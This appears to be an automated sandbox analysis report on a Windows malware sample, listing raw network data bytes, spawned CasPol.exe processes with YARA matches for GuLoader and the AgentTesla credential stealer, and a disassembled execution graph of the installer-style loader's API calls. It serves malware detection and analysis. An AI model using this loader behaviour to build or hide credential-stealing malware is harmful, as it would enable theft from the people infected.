                                                            May 25, 2022 22:44:01.703131914 CEST10419INData Raw: fa 1e 7c 90 09 ad ea 14 69 35 9d 26 b6 8b 56 87 6b 2d e5 79 90 79 96 11 76 a9 fe 01 1c 39 98 63 ef 7a 96 0b 94 58 6b ee 92 9d 3f e9 e1 4f 9b 1f f1 f7 2f 3f f7 10 b4 f1 ea f1 3a a1 1a 65 cd eb 5b 31 92 fb 76 22 c5 62 99 a3 95 ac a0 35 b5 95 66 11
                                                            Data Ascii: |i5&Vk-yyv9czXk?O/?:e[1v"b5fO\:6[0u;-#ctk`B\Zgrx_qnnxKZJ?TyMa"k'(O*Wv){1;}$84#1\q.u<yhY
                                                            May 25, 2022 22:44:01.703178883 CEST10420INData Raw: 74 96 4d dc ae 14 72 ea ec d8 85 b3 cf 2d d2 60 9b e4 80 4a eb fa 89 b8 54 2c 60 58 18 b2 52 bf 2f 70 56 c9 2e fa ae af 60 9c 19 62 96 19 7c 50 3e e9 d8 06 ca ec 92 dc 2b b8 3a fa 8e 30 11 cd 45 d8 f0 1e 44 db 7a a5 f9 a0 92 00 b7 15 59 13 2f 90
                                                            Data Ascii: tMr-`JT,`XR/pV.`b|P>+:0EDzY/@@4_N,.iuR}}KMe3xu>Bk\zv|Rjy:O"h!}md3k)6M;I7]mRDm'B
                                                            May 25, 2022 22:44:01.703224897 CEST10422INData Raw: 2d 35 38 c6 9d 29 39 cb fd da e2 39 af 56 f6 72 a9 63 6d d9 0e dc 7d 3e c2 59 59 9b 44 89 ab 01 a8 db 9e c4 7e fb be 61 cf a6 aa 81 62 85 83 39 cd de ac ab 5e a5 ab ff 43 4d 8e 67 65 d7 97 15 6b 14 0c 3f 4f 8b f4 e9 df d5 bf 17 9d 0f 89 b8 51 d4
                                                            Data Ascii: -58)99Vrcm}>YYD~ab9^CMgek?OQC8&8$_v.8bt-q! /j+TQqTh3uu ~u^r)>$ >z>);jUQx4c#a J1=[z}pH0_ZRx6
                                                            May 25, 2022 22:44:01.703269958 CEST10423INData Raw: bf e6 0b bc 5c 16 4d b0 b5 41 8d bf 75 47 47 a6 7a e4 5b f6 a5 95 44 49 16 c0 e5 1a 9e a2 f8 6f 9f a4 07 e4 4b f0 fb 8f f1 a0 c1 c9 85 25 60 57 04 d7 9c 0e 8d 7f e7 67 ef 8e 0a a4 eb 50 eb 09 ec 29 9b aa fe 67 45 f3 b3 f6 65 dc a8 ba 6b 33 a2 10
                                                            Data Ascii: \MAuGGz[DIoK%`WgP)gEek3)I9M!I W_fho [@O9kGP=sfsr!RofFRacD?E yF#gFxyLCp;WIJjN6qAJ6~^
                                                            May 25, 2022 22:44:01.703334093 CEST10424INData Raw: d8 8f 94 84 d0 65 33 fa d0 5a f8 06 20 d5 7e 38 f9 3d 54 5b cd 9f bd 60 19 9d a9 ca f6 d5 e2 19 05 81 73 13 d4 6f 07 dc a0 09 65 56 fa 51 fd fa 76 ce 2b 9a 3c 97 ba e4 08 2e 24 10 ff d7 95 a0 da 3b 3f 1d 9e e6 8d 9b d0 cf fe 2a 64 a1 bc 4c 00 11
                                                            Data Ascii: e3Z ~8=T[`soeVQv+<.$;?*dLgjtr& k,wm[rV`\NP,vqkUK6:@aSgWOYk<W('-0M32nMiaL',
                                                            May 25, 2022 22:44:01.703396082 CEST10426INData Raw: aa aa b7 e6 6b 44 7c ee fe dd 27 43 b8 b3 47 06 64 a4 60 0f f4 0e 03 cb ab 5a 98 a3 3d 64 73 8f 94 90 56 63 ba ca 71 57 21 ea 37 e1 2a 1e d3 70 b1 d8 6e 65 6b bb 4f 57 cb 3a db 17 8d 98 3e 17 c8 0d b1 d8 53 81 10 32 d5 95 67 92 3d e3 e5 6e 4f b3
                                                            Data Ascii: kD|'CGd`Z=dsVcqW!7*pnekOW:>S2g=nOSJs*ph!=!bwN,YEdWxe(3,-Hi.V~fU_k"y?dkxD5j`1J-d9sG
                                                            May 25, 2022 22:44:01.703459978 CEST10427INData Raw: a8 c2 7d a7 03 d5 70 87 b8 84 48 30 51 5a bb 50 ff 78 c3 12 17 48 b6 38 6b b2 81 ab ef 43 2b 22 8c c0 d0 12 7d cc b8 09 de 81 85 e9 2e 5f 59 e3 1c 8d e5 7d 72 a2 21 26 2a 6b 96 3c ed d0 6b 2f 89 4c 6c 1b fb e3 b2 93 11 3a 2a 4f fc aa d6 34 01 59
                                                            Data Ascii: }pH0QZPxH8kC+"}._Y}r!&*k<k/Ll:*O4Y#2DGi,'408nMMkd] E;m`Jes`-\7H9NpV`bu|\1PPiTwwZZM")gFF_u
                                                            May 25, 2022 22:44:01.756292105 CEST10429INData Raw: b5 24 06 0c 59 80 b9 10 45 d5 49 46 be 3c a2 f7 74 29 2f 0b 0d 11 f4 7b c9 19 66 ea ed 69 24 82 f2 56 8d c5 d9 dd f3 83 18 76 44 08 8e cf 1f 17 29 b5 08 b0 a3 2a 8d 43 1f cd 1f 98 a7 90 3f 20 a9 fe 0b 72 f2 98 63 e7 6b eb 64 66 d7 6b ee 83 9b 50
                                                            Data Ascii: $YEIF<t)/{fi$VvD)*C? rckdfkPOD70.gaD1ze/NnH:60y]c%%ct"Y%-{XgEr>[YS~^T\<r,`G=9,gWr.</;\>U


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:1
                                                            Start time:22:43:31
                                                            Start date:25/05/2022
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
                                                            Imagebase:0x400000
                                                            File size:1447056 bytes
                                                            MD5 hash:95050A1E0C7D4C57F62E26967B3B0BFD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.62482366099.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            Target ID:3
                                                            Start time:22:43:49
                                                            Start date:25/05/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
                                                            Imagebase:0x50000
                                                            File size:108664 bytes
                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:4
                                                            Start time:22:43:49
                                                            Start date:25/05/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
                                                            Imagebase:0x140000
                                                            File size:108664 bytes
                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:5
                                                            Start time:22:43:49
                                                            Start date:25/05/2022
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.10062.exe"
                                                            Imagebase:0xad0000
                                                            File size:108664 bytes
                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000005.00000002.67212135583.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000000.62332198808.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate

                                                            Target ID:6
                                                            Start time:22:43:49
                                                            Start date:25/05/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff752a40000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:4.1%
                                                              Dynamic/Decrypted Code Coverage:12.7%
                                                              Signature Coverage:22.6%
                                                              Total number of Nodes:1095
                                                              Total number of Limit Nodes:45
                                                              execution_graph 18229 403640 SetErrorMode GetVersionExW 18230 403692 GetVersionExW 18229->18230 18231 4036ca 18229->18231 18230->18231 18232 403723 18231->18232 18233 406a35 5 API calls 18231->18233 18320 4069c5 GetSystemDirectoryW 18232->18320 18233->18232 18235 403739 lstrlenA 18235->18232 18236 403749 18235->18236 18323 406a35 GetModuleHandleA 18236->18323 18239 406a35 5 API calls 18240 403757 18239->18240 18241 406a35 5 API calls 18240->18241 18242 403763 #17 OleInitialize SHGetFileInfoW 18241->18242 18329 406668 lstrcpynW 18242->18329 18245 4037b0 GetCommandLineW 18330 406668 lstrcpynW 18245->18330 18247 4037c2 18331 405f64 18247->18331 18250 4038f7 18251 40390b GetTempPathW 18250->18251 18335 40360f 18251->18335 18253 403923 18254 403927 GetWindowsDirectoryW lstrcatW 18253->18254 18255 40397d DeleteFileW 18253->18255 18258 40360f 12 API calls 18254->18258 18345 4030d0 GetTickCount GetModuleFileNameW 18255->18345 18256 405f64 CharNextW 18257 4037f9 18256->18257 18257->18250 18257->18256 18263 4038f9 18257->18263 18261 403943 18258->18261 18260 403990 18267 405f64 CharNextW 18260->18267 18293 403a54 18260->18293 18304 403a45 18260->18304 18261->18255 18262 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 18261->18262 18266 40360f 12 API calls 18262->18266 18431 406668 lstrcpynW 18263->18431 18270 403975 18266->18270 18283 4039b2 18267->18283 18270->18255 18270->18293 18271 403b91 18274 403b99 GetCurrentProcess OpenProcessToken 18271->18274 18275 403c0f ExitProcess 18271->18275 18272 403b7c 18494 405cc8 18272->18494 18280 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 18274->18280 18281 403bdf 18274->18281 18277 403a1b 18432 40603f 18277->18432 18278 403a5c 18448 405c33 18278->18448 18280->18281 18282 406a35 5 API calls 18281->18282 18289 403be6 18282->18289 18283->18277 18283->18278 18288 403bfb ExitWindowsEx 18288->18275 18292 403c08 18288->18292 18289->18288 18289->18292 18290 403a72 lstrcatW 18291 403a7d lstrcatW lstrcmpiW 18290->18291 18291->18293 18294 403a9d 18291->18294 18498 40140b 18292->18498 18485 403c25 18293->18485 18298 403aa2 18294->18298 18299 403aa9 18294->18299 18296 403a3a 18447 406668 lstrcpynW 18296->18447 18451 405b99 CreateDirectoryW 18298->18451 18456 405c16 CreateDirectoryW 18299->18456 18303 403aae SetCurrentDirectoryW 18306 403ac0 18303->18306 18307 403acb 18303->18307 18375 403d17 18304->18375 18459 406668 lstrcpynW 18306->18459 18460 406668 lstrcpynW 18307->18460 18312 403b19 CopyFileW 18317 403ad8 18312->18317 18313 403b63 18314 406428 36 API calls 18313->18314 18314->18293 18316 4066a5 17 API calls 18316->18317 18317->18313 18317->18316 18319 403b4d CloseHandle 18317->18319 18461 4066a5 18317->18461 18478 406428 MoveFileExW 18317->18478 18482 405c4b CreateProcessW 18317->18482 18319->18317 18321 4069e7 wsprintfW LoadLibraryExW 18320->18321 18321->18235 18324 406a51 18323->18324 18325 406a5b GetProcAddress 18323->18325 18326 4069c5 3 API calls 18324->18326 18327 403750 18325->18327 18328 406a57 18326->18328 18327->18239 18328->18325 18328->18327 18329->18245 18330->18247 18332 405f6a 18331->18332 18333 4037e8 CharNextW 18332->18333 18334 405f71 CharNextW 18332->18334 18333->18257 18334->18332 18501 4068ef 18335->18501 18337 40361b 18338 403625 18337->18338 18510 405f37 lstrlenW CharPrevW 18337->18510 18338->18253 18341 405c16 2 API calls 18342 403633 18341->18342 18513 406187 18342->18513 18517 406158 GetFileAttributesW CreateFileW 18345->18517 18347 403113 18374 403120 18347->18374 18518 406668 lstrcpynW 18347->18518 18349 403136 18519 405f83 lstrlenW 18349->18519 18353 403147 GetFileSize 18354 403241 18353->18354 18373 40315e 18353->18373 18524 40302e 18354->18524 18358 403286 GlobalAlloc 18361 40329d 18358->18361 18360 4032de 18362 40302e 32 API calls 18360->18362 18364 406187 2 API calls 18361->18364 18362->18374 18363 403267 18365 4035e2 ReadFile 18363->18365 18366 4032ae CreateFileW 18364->18366 18367 403272 18365->18367 18369 4032e8 18366->18369 18366->18374 18367->18358 18367->18374 18368 40302e 32 API calls 18368->18373 18539 4035f8 SetFilePointer 18369->18539 18371 4032f6 18540 403371 18371->18540 18373->18354 18373->18360 18373->18368 18373->18374 18555 4035e2 18373->18555 18374->18260 18376 406a35 5 API calls 18375->18376 18377 403d2b 18376->18377 18378 403d31 18377->18378 18379 403d43 18377->18379 18617 4065af wsprintfW 18378->18617 18618 406536 18379->18618 18382 403d92 lstrcatW 18385 403d41 18382->18385 18384 406536 3 API calls 18384->18382 18602 403fed 18385->18602 18388 40603f 18 API calls 18389 403dc4 18388->18389 18390 403e58 18389->18390 18392 406536 3 API calls 18389->18392 18391 40603f 18 API calls 18390->18391 18393 403e5e 18391->18393 18394 403df6 18392->18394 18395 403e6e LoadImageW 18393->18395 18396 4066a5 17 API calls 18393->18396 18394->18390 18401 403e17 lstrlenW 18394->18401 18402 405f64 CharNextW 18394->18402 18397 403f14 18395->18397 18398 403e95 RegisterClassW 18395->18398 18396->18395 18400 40140b 2 API calls 18397->18400 18399 403ecb SystemParametersInfoW CreateWindowExW 18398->18399 18430 403f1e 18398->18430 18399->18397 18405 403f1a 18400->18405 18403 403e25 lstrcmpiW 18401->18403 18404 403e4b 18401->18404 18406 403e14 18402->18406 18403->18404 18407 403e35 GetFileAttributesW 18403->18407 18408 405f37 3 API calls 18404->18408 18410 403fed 18 API calls 18405->18410 18405->18430 18406->18401 18409 403e41 18407->18409 18411 403e51 18408->18411 18409->18404 18412 405f83 2 API calls 18409->18412 18413 403f2b 18410->18413 18623 406668 lstrcpynW 18411->18623 18412->18404 18415 403f37 ShowWindow 18413->18415 18416 403fba 18413->18416 18418 4069c5 3 API calls 18415->18418 18610 40579d OleInitialize 18416->18610 18420 403f4f 18418->18420 18419 403fc0 18421 403fc4 18419->18421 18422 403fdc 18419->18422 18423 403f5d GetClassInfoW 18420->18423 18427 4069c5 3 API calls 18420->18427 18429 40140b 2 API calls 18421->18429 18421->18430 18426 40140b 2 API calls 18422->18426 18424 403f71 GetClassInfoW RegisterClassW 18423->18424 18425 403f87 DialogBoxParamW 18423->18425 18424->18425 18428 40140b 2 API calls 18425->18428 18426->18430 18427->18423 18428->18430 18429->18430 18430->18293 18431->18251 18639 406668 lstrcpynW 18432->18639 18434 406050 18640 405fe2 CharNextW CharNextW 18434->18640 18437 403a27 18437->18293 18446 406668 lstrcpynW 18437->18446 18438 4068ef 5 API calls 18444 406066 18438->18444 18439 406097 lstrlenW 18440 4060a2 18439->18440 18439->18444 18441 405f37 3 API calls 18440->18441 18443 4060a7 GetFileAttributesW 18441->18443 18443->18437 18444->18437 18444->18439 18445 405f83 2 API calls 18444->18445 18646 40699e FindFirstFileW 18444->18646 18445->18439 18446->18296 18447->18304 18449 406a35 5 API calls 18448->18449 18450 403a61 lstrcatW 18449->18450 18450->18290 18450->18291 18452 403aa7 18451->18452 18453 405bea GetLastError 18451->18453 18452->18303 18453->18452 18454 405bf9 SetFileSecurityW 18453->18454 18454->18452 18455 405c0f GetLastError 18454->18455 18455->18452 18457 405c26 18456->18457 18458 405c2a GetLastError 18456->18458 18457->18303 18458->18457 18459->18307 18460->18317 18476 4066b2 18461->18476 18462 4068d5 18463 403b0d DeleteFileW 18462->18463 18651 406668 lstrcpynW 18462->18651 18463->18312 18463->18317 18465 4068a3 lstrlenW 18465->18476 18466 4067ba GetSystemDirectoryW 18466->18476 18469 406536 3 API calls 18469->18476 18470 4066a5 10 API calls 18470->18465 18471 4067cd GetWindowsDirectoryW 18471->18476 18472 4068ef 5 API calls 18472->18476 18473 4067fc SHGetSpecialFolderLocation 18473->18476 18477 406814 SHGetPathFromIDListW CoTaskMemFree 18473->18477 18474 406844 lstrcatW 18474->18476 18475 4066a5 10 API calls 18475->18476 18476->18462 18476->18465 18476->18466 18476->18469 18476->18470 18476->18471 18476->18472 18476->18473 18476->18474 18476->18475 18649 4065af wsprintfW 18476->18649 18650 406668 lstrcpynW 18476->18650 18477->18476 18479 406449 18478->18479 18480 40643c 18478->18480 18479->18317 18652 4062ae 18480->18652 18483 405c8a 18482->18483 18484 405c7e CloseHandle 18482->18484 18483->18317 18484->18483 18486 403c40 18485->18486 18487 403c36 CloseHandle 18485->18487 18488 403c54 18486->18488 18489 403c4a CloseHandle 18486->18489 18487->18486 18686 403c82 18488->18686 18489->18488 18497 405cdd 18494->18497 18495 403b89 ExitProcess 18496 405cf1 MessageBoxIndirectW 18496->18495 18497->18495 18497->18496 18499 401389 2 API calls 18498->18499 18500 401420 18499->18500 18500->18275 18508 4068fc 18501->18508 18502 406972 18503 406977 CharPrevW 18502->18503 18506 406998 18502->18506 18503->18502 18504 406965 CharNextW 18504->18502 18504->18508 18505 405f64 CharNextW 18505->18508 18506->18337 18507 406951 CharNextW 18507->18508 18508->18502 18508->18504 18508->18505 18508->18507 18509 406960 CharNextW 18508->18509 18509->18504 18511 405f53 lstrcatW 18510->18511 18512 40362d 18510->18512 18511->18512 18512->18341 18514 406194 GetTickCount GetTempFileNameW 18513->18514 18515 4061ca 18514->18515 18516 40363e 18514->18516 18515->18514 18515->18516 18516->18253 18517->18347 18518->18349 18520 405f91 18519->18520 18521 40313c 18520->18521 18522 405f97 CharPrevW 18520->18522 18523 406668 lstrcpynW 18521->18523 18522->18520 18522->18521 18523->18353 18525 403057 18524->18525 18526 40303f 18524->18526 18529 403067 GetTickCount 18525->18529 18530 40305f 18525->18530 18527 403048 DestroyWindow 18526->18527 18528 40304f 18526->18528 18527->18528 18528->18358 18528->18374 18558 4035f8 SetFilePointer 18528->18558 18529->18528 18531 403075 18529->18531 18559 406a71 18530->18559 18533 4030aa CreateDialogParamW ShowWindow 18531->18533 18534 40307d 18531->18534 18533->18528 18534->18528 18563 403012 18534->18563 18536 40308b wsprintfW 18566 4056ca 18536->18566 18539->18371 18541 403380 SetFilePointer 18540->18541 18542 40339c 18540->18542 18541->18542 18577 403479 GetTickCount 18542->18577 18545 403439 18545->18374 18548 403479 42 API calls 18549 4033d3 18548->18549 18549->18545 18550 40343f ReadFile 18549->18550 18552 4033e2 18549->18552 18550->18545 18552->18545 18553 4061db ReadFile 18552->18553 18592 40620a WriteFile 18552->18592 18553->18552 18556 4061db ReadFile 18555->18556 18557 4035f5 18556->18557 18557->18373 18558->18363 18560 406a8e PeekMessageW 18559->18560 18561 406a84 DispatchMessageW 18560->18561 18562 406a9e 18560->18562 18561->18560 18562->18528 18564 403021 18563->18564 18565 403023 MulDiv 18563->18565 18564->18565 18565->18536 18567 4056e5 18566->18567 18568 4030a8 18566->18568 18569 405701 lstrlenW 18567->18569 18570 4066a5 17 API calls 18567->18570 18568->18528 18571 40572a 18569->18571 18572 40570f lstrlenW 18569->18572 18570->18569 18574 405730 SetWindowTextW 18571->18574 18575 40573d 18571->18575 18572->18568 18573 405721 lstrcatW 18572->18573 18573->18571 18574->18575 18575->18568 18576 405743 SendMessageW SendMessageW SendMessageW 18575->18576 18576->18568 18578 4035d1 18577->18578 18579 4034a7 18577->18579 18580 40302e 32 API calls 18578->18580 18594 4035f8 SetFilePointer 18579->18594 18587 4033a3 18580->18587 18582 4034b2 SetFilePointer 18586 4034d7 18582->18586 18583 4035e2 ReadFile 18583->18586 18585 40302e 32 API calls 18585->18586 18586->18583 18586->18585 18586->18587 18588 40620a WriteFile 18586->18588 18589 4035b2 SetFilePointer 18586->18589 18595 406bb0 18586->18595 18587->18545 18590 4061db ReadFile 18587->18590 18588->18586 18589->18578 18591 4033bc 18590->18591 18591->18545 18591->18548 18593 406228 18592->18593 18593->18552 18594->18582 18596 406bd5 18595->18596 18597 406bdd 18595->18597 18596->18586 18597->18596 18598 406c64 GlobalFree 18597->18598 18599 406c6d GlobalAlloc 18597->18599 18600 406ce4 GlobalAlloc 18597->18600 18601 406cdb GlobalFree 18597->18601 18598->18599 18599->18596 18599->18597 18600->18596 18600->18597 18601->18600 18603 404001 18602->18603 18624 4065af wsprintfW 18603->18624 18605 404072 18625 4040a6 18605->18625 18607 403da2 18607->18388 18608 404077 18608->18607 18609 4066a5 17 API calls 18608->18609 18609->18608 18628 404610 18610->18628 18612 4057c0 18616 4057e7 18612->18616 18631 401389 18612->18631 18613 404610 SendMessageW 18614 4057f9 OleUninitialize 18613->18614 18614->18419 18616->18613 18617->18385 18635 4064d5 18618->18635 18621 403d73 18621->18382 18621->18384 18622 40656a RegQueryValueExW RegCloseKey 18622->18621 18623->18390 18624->18605 18626 4066a5 17 API calls 18625->18626 18627 4040b4 SetWindowTextW 18626->18627 18627->18608 18629 404628 18628->18629 18630 404619 SendMessageW 18628->18630 18629->18612 18630->18629 18633 401390 18631->18633 18632 4013fe 18632->18612 18633->18632 18634 4013cb MulDiv SendMessageW 18633->18634 18634->18633 18636 4064e4 18635->18636 18637 4064ed RegOpenKeyExW 18636->18637 18638 4064e8 18636->18638 18637->18638 18638->18621 18638->18622 18639->18434 18641 405fff 18640->18641 18643 406011 18640->18643 18641->18643 18644 40600c CharNextW 18641->18644 18642 406035 18642->18437 18642->18438 18643->18642 18645 405f64 CharNextW 18643->18645 18644->18642 18645->18643 18647 4069b4 FindClose 18646->18647 18648 4069bf 18646->18648 18647->18648 18648->18444 18649->18476 18650->18476 18651->18463 18653 406304 GetShortPathNameW 18652->18653 18654 4062de 18652->18654 18656 406423 18653->18656 18657 406319 18653->18657 18679 406158 GetFileAttributesW CreateFileW 18654->18679 18656->18479 18657->18656 18659 406321 wsprintfA 18657->18659 18658 4062e8 CloseHandle GetShortPathNameW 18658->18656 18660 4062fc 18658->18660 18661 4066a5 17 API calls 18659->18661 18660->18653 18660->18656 18662 406349 18661->18662 18680 406158 GetFileAttributesW CreateFileW 18662->18680 18664 406356 18664->18656 18665 406365 GetFileSize GlobalAlloc 18664->18665 18666 406387 18665->18666 18667 40641c CloseHandle 18665->18667 18668 4061db ReadFile 18666->18668 18667->18656 18669 40638f 18668->18669 18669->18667 18681 4060bd lstrlenA 18669->18681 18672 4063a6 lstrcpyA 18675 4063c8 18672->18675 18673 4063ba 18674 4060bd 4 API calls 18673->18674 18674->18675 18676 4063ff SetFilePointer 18675->18676 18677 40620a WriteFile 18676->18677 18678 406415 GlobalFree 18677->18678 18678->18667 18679->18658 18680->18664 18682 4060fe lstrlenA 18681->18682 18683 4060d7 lstrcmpiA 18682->18683 18685 406106 18682->18685 18684 4060f5 CharNextA 18683->18684 18683->18685 18684->18682 18685->18672 18685->18673 18687 403c90 18686->18687 18688 403c59 18687->18688 18689 403c95 FreeLibrary GlobalFree 18687->18689 18690 405d74 18688->18690 18689->18688 18689->18689 18691 40603f 18 API calls 18690->18691 18692 405d94 18691->18692 18693 405db3 18692->18693 18694 405d9c DeleteFileW 18692->18694 18696 405ed3 18693->18696 18729 406668 lstrcpynW 18693->18729 18695 403b71 OleUninitialize 18694->18695 18695->18271 18695->18272 18696->18695 18703 40699e 2 API calls 18696->18703 18698 405dd9 18699 405dec 18698->18699 18700 405ddf lstrcatW 18698->18700 18702 405f83 2 API calls 18699->18702 18701 405df2 18700->18701 18704 405e02 lstrcatW 18701->18704 18706 405e0d lstrlenW FindFirstFileW 18701->18706 18702->18701 18705 405ef8 18703->18705 18704->18706 18705->18695 18707 405efc 18705->18707 18706->18696 18709 405e2f 18706->18709 18708 405f37 3 API calls 18707->18708 18710 405f02 18708->18710 18711 405eb6 FindNextFileW 18709->18711 18725 405e77 18709->18725 18730 406668 lstrcpynW 18709->18730 18712 405d2c 5 API calls 18710->18712 18711->18709 18715 405ecc FindClose 18711->18715 18714 405f0e 18712->18714 18716 405f12 18714->18716 18717 405f28 18714->18717 18715->18696 18716->18695 18720 4056ca 24 API calls 18716->18720 18719 4056ca 24 API calls 18717->18719 18719->18695 18722 405f1f 18720->18722 18721 405d74 60 API calls 18721->18725 18724 406428 36 API calls 18722->18724 18723 4056ca 24 API calls 18723->18711 18726 405f26 18724->18726 18725->18711 18725->18721 18725->18723 18727 4056ca 24 API calls 18725->18727 18728 406428 36 API calls 18725->18728 18731 405d2c 18725->18731 18726->18695 18727->18725 18728->18725 18729->18698 18730->18709 18739 406133 GetFileAttributesW 18731->18739 18734 405d59 18734->18725 18735 405d47 RemoveDirectoryW 18737 405d55 18735->18737 18736 405d4f DeleteFileW 18736->18737 18737->18734 18738 405d65 SetFileAttributesW 18737->18738 18738->18734 18740 405d38 18739->18740 18741 406145 SetFileAttributesW 18739->18741 18740->18734 18740->18735 18740->18736 18741->18740 18742 401941 18743 401943 18742->18743 18748 402da6 18743->18748 18746 405d74 67 API calls 18747 401951 18746->18747 18749 402db2 18748->18749 18750 4066a5 17 API calls 18749->18750 18751 402dd3 18750->18751 18752 401948 18751->18752 18753 4068ef 5 API calls 18751->18753 18752->18746 18753->18752 18754 4015c1 18755 402da6 17 API calls 18754->18755 18756 4015c8 18755->18756 18757 405fe2 4 API calls 18756->18757 18764 4015d1 18757->18764 18758 401631 18760 401663 18758->18760 18761 401636 18758->18761 18759 405f64 CharNextW 18759->18764 18763 401423 24 API calls 18760->18763 18773 401423 18761->18773 18771 40165b 18763->18771 18764->18758 18764->18759 18766 405c16 2 API calls 18764->18766 18768 405c33 5 API calls 18764->18768 18770 401617 GetFileAttributesW 18764->18770 18772 405b99 4 API calls 18764->18772 18766->18764 18768->18764 18769 40164a SetCurrentDirectoryW 18769->18771 18770->18764 18772->18764 18774 4056ca 24 API calls 18773->18774 18775 401431 18774->18775 18776 406668 lstrcpynW 18775->18776 18776->18769 18777 4040c5 18778 4040dd 18777->18778 18779 40423e 18777->18779 18778->18779 18782 4040e9 18778->18782 18780 40428f 18779->18780 18781 40424f GetDlgItem GetDlgItem 18779->18781 18784 4042e9 18780->18784 18796 401389 2 API calls 18780->18796 18783 4045c4 18 API calls 18781->18783 18785 4040f4 SetWindowPos 18782->18785 18786 404107 18782->18786 18787 404279 SetClassLongW 18783->18787 18788 404610 SendMessageW 18784->18788 18797 404239 18784->18797 18785->18786 18789 404110 ShowWindow 18786->18789 18790 404152 18786->18790 18793 40140b 2 API calls 18787->18793 18819 4042fb 18788->18819 18791 404130 GetWindowLongW 18789->18791 18792 40422b 18789->18792 18794 404171 18790->18794 18795 40415a DestroyWindow 18790->18795 18791->18792 18798 404149 ShowWindow 18791->18798 18859 40462b 18792->18859 18793->18780 18799 404176 SetWindowLongW 18794->18799 18800 404187 18794->18800 18849 40454d 18795->18849 18801 4042c1 18796->18801 18798->18790 18799->18797 18800->18792 18805 404193 GetDlgItem 18800->18805 18801->18784 18806 4042c5 SendMessageW 18801->18806 18803 40140b 2 API calls 18803->18819 18804 40454f DestroyWindow EndDialog 18804->18849 18808 4041c1 18805->18808 18809 4041a4 SendMessageW IsWindowEnabled 18805->18809 18806->18797 18807 40457e ShowWindow 18807->18797 18811 4041ce 18808->18811 18814 404215 SendMessageW 18808->18814 18815 4041e1 18808->18815 18822 4041c6 18808->18822 18809->18797 18809->18808 18810 4066a5 17 API calls 18810->18819 18811->18814 18811->18822 18813 4045c4 18 API calls 18813->18819 18814->18792 18816 4041e9 18815->18816 18817 4041fe 18815->18817 18820 40140b 2 API calls 18816->18820 18821 40140b 2 API calls 18817->18821 18818 4041fc 18818->18792 18819->18797 18819->18803 18819->18804 18819->18810 18819->18813 18840 40448f DestroyWindow 18819->18840 18850 4045c4 18819->18850 18820->18822 18823 404205 18821->18823 18856 40459d 18822->18856 18823->18792 18823->18822 18825 404376 GetDlgItem 18826 404393 ShowWindow KiUserCallbackDispatcher 18825->18826 18827 40438b 18825->18827 18853 4045e6 KiUserCallbackDispatcher 18826->18853 18827->18826 18829 4043bd EnableWindow 18834 4043d1 18829->18834 18830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 18831 404406 SendMessageW 18830->18831 18830->18834 18831->18834 18833 4040a6 18 API calls 18833->18834 18834->18830 18834->18833 18854 4045f9 SendMessageW 18834->18854 18855 406668 lstrcpynW 18834->18855 18836 404435 lstrlenW 18837 4066a5 17 API calls 18836->18837 18838 40444b SetWindowTextW 18837->18838 18839 401389 2 API calls 18838->18839 18839->18819 18841 4044a9 CreateDialogParamW 18840->18841 18840->18849 18842 4044dc 18841->18842 18841->18849 18843 4045c4 18 API calls 18842->18843 18844 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 18843->18844 18845 401389 2 API calls 18844->18845 18846 40452d 18845->18846 18846->18797 18847 404535 ShowWindow 18846->18847 18848 404610 SendMessageW 18847->18848 18848->18849 18849->18797 